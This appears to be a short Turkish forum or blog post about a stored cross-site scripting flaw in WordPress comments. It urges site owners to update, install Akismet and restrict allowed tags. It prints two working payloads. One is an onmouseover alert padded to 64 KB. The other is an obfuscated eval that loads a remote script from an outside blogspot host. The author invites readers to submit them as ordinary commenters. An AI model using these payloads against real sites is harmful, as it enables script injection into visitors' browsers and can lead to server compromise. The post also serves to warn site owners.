Wordpress güncellemeyi yayınladı fakat exploit geliştirilebilir siz her ihtimale karşı akismet eklentisini sitelerinize kurun ,
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>
Taglarının kullanımını sınırlandırın.
<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>
Deneme yapmak isteyen arkadaşlar yukarıdaki exploiti yorum kısımlarından normal kullanıcı olarak gonderebilirler.64 KB A mevzusunu anlatmıyorum biliyorsunuzdur ...
<abbr title="qweqw style=display:block;width:9900px;position:absolute;height:9900px;top:-100px;left:-100px; onmouseover=eval(unescape(/with%28document%290%5Bbody.appendChild%28createElement%28%27script%27%29%29.src%3D%27%2f%21ile0.blogspot%2fjustrulz%27%5D/.source))// ">
Daha da kötüsü xss diye geçiştirmeyin payload geliştirilince sunucunuza listpatch dahi atılabiliyor : )
Şuan dünya çapında aktif rus ve hindu kötü niyetli arkadaslar tema dosyaniz/404.php ya da wp content hello.php ye farklı kodlar inject etmektedirler.
En kısa sürede güncellemelerinizi yapın arkadaşlar.
0 'WordPress XSS'